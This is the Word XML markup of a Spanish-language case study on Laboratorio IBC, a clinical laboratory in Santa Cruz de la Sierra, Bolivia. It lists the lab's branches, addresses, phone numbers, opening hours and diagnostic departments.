      <w:bookmarkStart w:id="29" w:name="_Toc422314639"/>
      <w:bookmarkStart w:id="30" w:name="_Toc454371298"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Caso d</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>e Estudio</w:t>
      </w:r>
      <w:r w:rsidR="00277259" w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> #03: “Laboratorio IBC”</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
      <w:bookmarkEnd w:id="28"/>
      <w:bookmarkEnd w:id="29"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r w:rsidR="00277259" w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="292DEB1A" wp14:editId="61A0FDEA">
            <wp:extent cx="1171575" cy="1231450"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="387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654" t="23017" r="62652" b="51383"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1178505" cy="12387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rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Laboratorio IBC, se encuentra ubicado en la calle España, N</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:t>°</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> 690, Santa Cruz de la Sierra, su página web es </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00BB4EFA">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>www.laboratorioibc.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y cuenta con las siguientes sucursales:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7839E00F" wp14:editId="5F55886C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3491865</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>98425</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2332990" cy="2350770"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="705" y="0"/>
                <wp:lineTo x="0" y="350"/>
                <wp:lineTo x="0" y="21180"/>
                <wp:lineTo x="705" y="21355"/>
                <wp:lineTo x="20636" y="21355"/>
                <wp:lineTo x="21341" y="21180"/>
                <wp:lineTo x="21341" y="350"/>
                <wp:lineTo x="20636" y="0"/>
                <wp:lineTo x="705" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="5" name="Imagen 5" descr="http://www.laboratorioibc.com/images/su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aboratorioibc.com/images/suc0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2695" t="18599" r="14378" b="18389"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2332990" cy="235077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4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>SUCURSAL LABORATORIO IBC CENTRAL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:bCs/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>Dirección:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t> C/ España Esquina Andrés Ibáñez</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:bCs/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>Teléfono:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t> (591) (3) 337-1222 Fax (591) (3) 336-1547</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:bCs/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>Referencia:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t> Frente al Hospital de la Caja Petrolera de Salud</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:bCs/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>Horarios: Lunes a Viernes</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t> de 7:00 - 21:00 / </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:bCs/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>Sábados</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t> de 7:30 – 20:00 /</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:bCs/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>Domingos y feriados</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t> de 8:00 – 12:00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="17"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="17"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="17"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="17"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6F5F8381" wp14:editId="3E44D7C3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>27305</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2152650" cy="2184400"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="765" y="0"/>
                <wp:lineTo x="0" y="377"/>
                <wp:lineTo x="0" y="21098"/>
                <wp:lineTo x="573" y="21474"/>
                <wp:lineTo x="765" y="21474"/>
                <wp:lineTo x="20644" y="21474"/>
                <wp:lineTo x="20835" y="21474"/>
                <wp:lineTo x="21409" y="21098"/>
                <wp:lineTo x="21409" y="377"/>
                <wp:lineTo x="20644" y="0"/>
                <wp:lineTo x="765" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="6" name="Imagen 6" descr="http://www.laboratorioibc.com/images/suc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aboratorioibc.com/images/suc0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8708" t="30045" r="15583" b="3659"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2152650" cy="21844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77259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="es-BO" w:eastAsia="es-BO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="es-BO" w:eastAsia="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="es-BO" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>SUCURSAL LABORATORIO IBC NORTE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:bCs/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>Dirección:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t> Av. Beni No. 473</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:bCs/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>Teléfono:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t> (591) (3) 341- 7000</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:bCs/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>Referencia:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve"> Frente al Supermercado </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>Fidalga</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve"> “Hamacas” entre 3er y 4to anillo</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:bCs/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>Horarios: Lunes a Viernes</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t> de 7:00 - 19:00 / </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:bCs/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>Sábados</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t> de 7:00 – 12:00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="72161CE4" wp14:editId="555F5ADA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>233680</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2047875" cy="2085975"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="804" y="0"/>
                <wp:lineTo x="0" y="395"/>
                <wp:lineTo x="0" y="21304"/>
                <wp:lineTo x="804" y="21501"/>
                <wp:lineTo x="20696" y="21501"/>
                <wp:lineTo x="21500" y="21304"/>
                <wp:lineTo x="21500" y="395"/>
                <wp:lineTo x="20696" y="0"/>
                <wp:lineTo x="804" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="7" name="Imagen 7" descr="http://www.laboratorioibc.com/images/suc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aboratorioibc.com/images/suc03.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29830" t="7584" r="10287" b="31747"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2047875" cy="20859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7259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>SUCURSAL LABORATORIO IBC SUR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:bCs/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>Dirección:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve"> Av. Monseñor </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>Santiesteban</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve"> No. 351</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:bCs/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>Teléfono:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t> (591) (3) 337-0624  /  (591) (3) 332-1816</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:bCs/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>Referencia:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t> Frente a la Iglesia la Pompeya entre 1er y 2do anillo</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:bCs/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>Horarios: Lunes a Sábados</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t> de 7:30 – 12:00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259"/>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259"/>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Instituto </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Bioclínico</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cruceño Ltda</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:t xml:space="preserve">. Es una empresa cuya actividad está dedicada al análisis clínico y diagnóstico. Es una empresa conformada por profesionales bioquímicos especializados en diferentes áreas del Laboratorio Clínico quienes trabajan como responsables de cada departamento, donde realizan toda clase de exámenes de laboratorio. Ofrece, también, otros servicios de apoyo para el diagnóstico que eventualmente requieren sus pacientes. Para ello cuenta con la infraestructura adecuada y una organización </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:t>departamentalizada</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:t xml:space="preserve"> que permite brindar un excelente servicio, optimizado con un sistema computarizado para una eficiente atención a los pacientes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>Servicios</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:color w:val="276E8B" w:themeColor="accent1" w:themeShade="BF"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">Los exámenes de rutina, así como también los más modernos y especializados, son realizados en los departamentos de:  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Hematología</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Química Sanguínea</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Enzimología</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Uroanálisis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Parasitología</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Pruebas Especiales</w:t>
      </w:r>
    </w:p>
